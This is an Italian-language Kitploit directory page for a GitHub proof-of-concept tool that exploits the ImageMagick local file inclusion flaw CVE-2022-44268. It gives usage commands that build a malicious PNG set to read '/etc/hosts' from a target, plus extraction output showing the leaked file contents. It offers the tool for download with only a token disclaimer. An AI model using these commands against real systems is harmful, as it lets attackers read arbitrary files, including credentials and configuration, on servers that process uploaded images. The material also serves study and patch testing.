Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-44268 — Genera file PNG dannosi per sfruttare la vulnerabilità LFI di ImageMagick (CVE-2022-44268) per la lettura arbitraria di file, con script di estrazione per la prova di concetto. | Kitploit
Strumenti/GitHubGitHub/pog-frog/cve-2022-44268
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHubpog-frog/cve-2022-44268

cve-2022-44268

Genera file PNG dannosi per sfruttare la vulnerabilità LFI di ImageMagick (CVE-2022-44268) per la lettura arbitraria di file, con script di estrazione per la prova di concetto.

Vedi Repository
143 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-44268

ImageMagick è una suite software gratuita e open-source multipiattaforma per visualizzare, convertire e modificare immagini raster e vettoriali. Può leggere e scrivere oltre 200 formati di file immagine. ImageMagick è rilasciato sotto licenza Apache 2.0. È disponibile sotto forma di strumenti a riga di comando, oltre che come API C e un insieme di classi C++. Wikipedia

ImageMagick versioni 7.1.0-40 e precedenti sono vulnerabili a una vulnerabilità di Local File Inclusion. La vulnerabilità è causata da una validazione impropria dell'input fornito dall'utente. Un attaccante può sfruttare questa vulnerabilità inviando un file PNG appositamente modificato al target. Lo sfruttamento riuscito potrebbe consentire a un attaccante di leggere file arbitrari sul sistema target.

Crediti ai ricercatori che hanno scoperto questa vulnerabilità:

  • Bryan Gonzalez and the Ocelot Team

Creare un PNG malevolo per sfruttare ImageMagick 7.1.0-40:

  • CVE-2022-44267: Negazione del Servizio
  • CVE-2022-44268: Divulgazione di Informazioni

Requisiti

  • Python3
  • PIL (pip install Pillow)

Utilizzo

Creazione di un PNG con generate.py:

python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

PoC

python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Disclaimer: Sii buono, per favore non usarlo per scopi malvagi

Scarica lo strumento